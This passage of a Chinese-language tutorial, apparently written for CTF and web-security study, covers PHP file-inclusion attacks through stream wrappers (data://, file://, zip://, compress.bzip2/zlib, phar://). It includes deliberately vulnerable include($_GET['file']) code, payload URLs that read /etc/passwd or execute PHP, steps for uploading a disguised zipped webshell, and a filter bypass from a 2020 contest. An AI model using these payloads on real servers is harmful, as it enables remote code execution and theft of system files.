<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeibeQ264QsqHKmyzsx40iaaib1TFCfkqZPElTLEKiakhN7JTyiaHUJtzgw1w/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815202637601</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeY014DtPMeYaHNLjlXgVJk1I7dHuhsA99aGL7PbBISbMsobQWdTlCibg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815203509516</p>
<p>也可以像一下这种形式：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=data:text/plain,&lt;?php phpinfo()?&gt;</span><br><span class="line">test.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=</span><br><span class="line">test.php?file=data:,&lt;?php phpinfo()?&gt;</span><br></pre></td></tr></table></figure>

<p>都是可以的：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoetnpichbgVVLkDQtuLeNlCqJm5sL40ibpNzyicXndPU0HSLtUvNpPr5lKQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815203746759</p>
<p>有权限的话还可以写shell。</p>
<p>data这里还有这样一个好玩的，这是2020蓝帽杯的一个题，有以下一个限制：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeWsOm1SZiccyxX5WpRF2OawbeLvpxAjADGDR28hG2mpnRvpWvvj6qknQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200807184117327</p>
<p>让我们用GET传一个参数，指向一个文件，如果开文件的内容中不存在<code>&lt;?</code>和<code>php</code>，那么就包含该文件。我们的利用思路当然是让他包含一个php文件。</p>
<p>我们用以下方法绕过，即：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">file_get_contents(&#x27;data:,xx/res&#x27;);   // 将返回字符串&#x27;xx/res&#x27; </span><br><span class="line">include(&#x27;data:,xx/res&#x27;);            // 将包含res文件的内容</span><br></pre></td></tr></table></figure>

<p>证明测试如下：</p>
<p>在Web根目录下有一个test.php，还有一个名为<code>data:,xx</code>的目录，里面有一个res文件，res文件的内容为<code>&lt;? phpinfo();?&gt;</code>：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeFzSJSIfRAicwibIgwESruSCevfibice0mVSfQjWHqMbMPE4bQn9GMicPBng/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200808164538288</p>
<p>访问test.php代码如下：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoehuhjwqLvYic9LgkvWFDMhhwTPj21R1r8F1a9Z96FyKqA1XicibTgXjNBw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200808164559941</p>
<p>此时，如果我们输入<code>/test.php?page=data:,xx/res</code>：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeljsGWZIcDks6R0LfrhH1JrjMS344ZwJhzezOStwicVHBfuicpC71xiboA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200808164713218</p>
<p>如上图将返回字符串’xx&#x2F;res’。接下来我们把include前的注释去掉，再测试一遍：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoesPDZ4pTf47kkGjB4DwdFiaxtONe4bGXtmiaJmIM6fYJNkrKkRC7OmOdg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200808165107017</p>
<p>效果可见一斑。利用以上原理，就可以绕过这个限制了。</p>
<p><strong>也就是说，如果data是这种形式：<code>data:,xx/res</code>，且不存在data:,xx目录的话，include和file_get_contents都返回字符串<code>xx/res</code>；如果存在data:,xx目录的话，那么include将包含data:,xx目录里的res文件，造成php代码执行，而file_get_contents则任然只会返回字符串<code>xx/res</code>。</strong></p>
<h2 id="file-x2F-x2F-协议"><a href="#file-x2F-x2F-协议" class="headerlink" title="file:&#x2F;&#x2F; 协议"></a>file:&#x2F;&#x2F; 协议</h2><p>通过file协议可以访问本地文件系统，读取到文件的内容,</p>
<p>测试代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    include($_GET[&#x27;file&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=file:///etc/passwd</span><br></pre></td></tr></table></figure>

<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeI00lqcuAaK8ejC5lZHBlK2ZQdz38gbKibNuU2LvX0LD091L5UibksQWQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815205507910</p>
<p>但是不能用来读取php文件的源码，且单纯的file:&#x2F;&#x2F;伪协议不配合文件包含漏洞是不能执行文件里的php代码的。</p>
<h2 id="zip-x2F-x2F-、bzip2-x2F-x2F-、zlib-x2F-x2F-协议"><a href="#zip-x2F-x2F-、bzip2-x2F-x2F-、zlib-x2F-x2F-协议" class="headerlink" title="zip:&#x2F;&#x2F;、bzip2:&#x2F;&#x2F;、zlib:&#x2F;&#x2F;协议"></a>zip:&#x2F;&#x2F;、bzip2:&#x2F;&#x2F;、zlib:&#x2F;&#x2F;协议</h2><p>zip:&#x2F;&#x2F;, bzip2:&#x2F;&#x2F;, zlib:&#x2F;&#x2F; 均属于压缩流，<strong>可以访问压缩文件中的子文件</strong>，更重要的是不需要指定后缀名，可修改为任意后缀：<code>jpg png gif xxx</code> 等等。</p>
<p><strong>要求php.ini：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen: off/on      // 无要求</span><br><span class="line">allow_url_include: off/on    // 无要求</span><br></pre></td></tr></table></figure>

<p>zip:&#x2F;&#x2F;, bzip2:&#x2F;&#x2F;, zlib:&#x2F;&#x2F;协议在双off的情况下也可以正常使用。</p>
<h3 id="zip-x2F-x2F-协议"><a href="#zip-x2F-x2F-协议" class="headerlink" title="zip:&#x2F;&#x2F;协议"></a>zip:&#x2F;&#x2F;协议</h3><p>条件：PHP &gt; &#x3D;5.3.0，注意在windows下测试要5.3.0&lt;PHP&lt;5.4 才可以</p>
<p><strong>使用方法：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">zip://archive.zip#dir/file.txt</span><br><span class="line">zip://[压缩文件绝对路径]#[压缩文件内的子文件名]</span><br></pre></td></tr></table></figure>

<p><strong><code>#</code> 在浏览器中要编码为%23，否则浏览器默认不会传输特殊字符。</strong></p>
<p>测试代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    include($_GET[&#x27;file&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>即先在本地将要执行的PHP代码写好文件名为shell.php，再将shell.txt进行zip压缩，压缩文件名为whoami.zip：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoen9IRicw4pAt5ShOKR8bSR5b7Yic1Zo5EuuNEgKA3ic0IvPQibnAWqLTIvQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815210650620</p>
<p>如果可以上传zip文件便直接上传，若不能便将whoami.zip重命名为whoami.jpg后再上传，其他几种压缩格式也可以这样操作。然后，就用zip:&#x2F;&#x2F;协议访问我们上传的whoami.zip（或whoami.jpg）里面的shell.php（适用于有文件上传和文件包含的地方）：</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=zip:///var/www/html/whoami.zip%23shell.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeaCBmia47icujKhWPcbWfsL6XEenmbw7lZGsCMTlPQ5yCG9YwU3Vp9qlg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815212307187</p>
<h3 id="bzip2-x2F-x2F-协议"><a href="#bzip2-x2F-x2F-协议" class="headerlink" title="bzip2:&#x2F;&#x2F;协议"></a>bzip2:&#x2F;&#x2F;协议</h3><p><strong>使用方法：</strong></p>
<p>compress.bzip2:&#x2F;&#x2F;file.bz2</p>
<p>压缩 phpinfo.txt 为 phpinfo.bz2 并上传（同样支持任意后缀名）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=compress.bzip2://目录/phpinfo.bz2</span><br></pre></td></tr></table></figure>

<p>即可执行phpinfo。</p>
<h3 id="zlib-x2F-x2F-协议"><a href="#zlib-x2F-x2F-协议" class="headerlink" title="zlib:&#x2F;&#x2F;协议"></a>zlib:&#x2F;&#x2F;协议</h3><p><strong>使用方法：</strong></p>
<p>compress.zlib:&#x2F;&#x2F;file.gz</p>
<p>压缩 phpinfo.txt 为 phpinfo.gz 并上传（同样支持任意后缀名）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=compress.zlib://目录/phpinfo.bz2</span><br></pre></td></tr></table></figure>

<p>即可执行phpinfo。</p>
<h2 id="phar-x2F-x2F-伪协议"><a href="#phar-x2F-x2F-伪协议" class="headerlink" title="phar:&#x2F;&#x2F;伪协议"></a>phar:&#x2F;&#x2F;伪协议</h2><p><code>phar://</code>协议与<code>zip://</code>类似，同样可以访问zip格式压缩包内容，<strong>不管后缀是什么，都会当做压缩包来解压</strong>。</p>
<p>用法：**?file&#x3D;phar:&#x2F;&#x2F;压缩包&#x2F;内部文件** 注意：PHP &gt; &#x3D;5.3.0 压缩包需要是zip协议压缩，rar不行，将木马文件压缩后，改为其他任意格式的文件都可以正常使用。</p>
<p>测试代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    include($_GET[&#x27;file&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>步骤：写一个木马文件shell.txt，然后用zip协议压缩为whoami.zip，然后将后缀改为png等其他格式，上传，然后再用phar伪协议来访问：</strong> （和zip:&#x2F;&#x2F;用法类似的）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=phar:///var/www/html/whoami.png/shell.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoepXBzpJgib2DJ8r9lda0PUf3f8W8GicBpLe1ORXdKe59uApUoMWyA8ybg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片"></p>
</div>
</article>

  </main>
  <aside>
    <p>This is an `aside`, a useful place to put information of any kind: metadata about the site author (with or without pictures), brief information about the purposes of the site, a static collection of external links or anything else.</p>
<p>For some Classless themes pictures and data about the author may suit better in the `cover` and `description` site attributes (see `config.toml`), but most of the times that kind of information will fit here better.</p>

  </aside>
  <footer role="contentinfo">
    <p>A default site footer. If you don't know what to place here maybe you should just write your name plus the current year?</p>
<p>If you want to have a sitemap, a contact form or other complex stuff, most Classless themes will also handle it nicely. Or you can take a look at the <code>aside.html</code> partial.</p>

  </footer>
</body>
